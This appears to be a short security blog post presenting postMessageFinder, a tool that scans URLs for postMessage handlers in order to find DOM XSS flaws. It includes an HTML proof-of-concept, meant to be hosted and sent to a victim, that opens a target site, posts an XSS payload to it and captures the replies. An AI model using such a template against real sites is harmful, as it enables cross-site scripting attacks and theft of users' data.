Tools: postMessageFinder

Here now I’m presenting to you a tool I made last year that now I’m retaking, and tweaking. This tool checks if a set of urls contains one or more postMessage functions or eventhandlers.

Usage

./postMessageFinder -i urls.txt

Usage of postMessageFinder:
  -H value
        Headers ex: -H='Cookie: PHPSESSID=shjhjdgvbhjhvnv'
  -i string
        Path to file containing urls to test (default "urls.txt")

This is useful for testing for DOM XSS vulnerabilities and issues, were it could be exploited by using iFrames or child pages. For example you could host the following HMTL code in a webpage and send that page to your victim, and a popup will be opened sending to it a postMessage with a malicious flavour:

<html>
<script>
let url = "https://vulnerablewebsite.com";
let popupType = "_blank";
let popupOptions = "width=500,height=500";

//opening the popup
childWindow=window.open(url,popupType,popupOptions);

//sending the postMessage
childWindow.postMessage({"vulnerableObject":alert("xss")});

//Here you can capture any postmessage on the child page
window.addEventListener("message", function(e) { 
    console.log(e.data);//your data is captured in e.data 
}, false);
</script>
</html>

The original github URL was at @pelaohxc account, that was expropiated by the donkeys 💩, now I will be pushing updates to this Github repo: @xpl0ited1

In the next posts I will be posting how to exploit this postMessage issues, so stay in touch! 🤭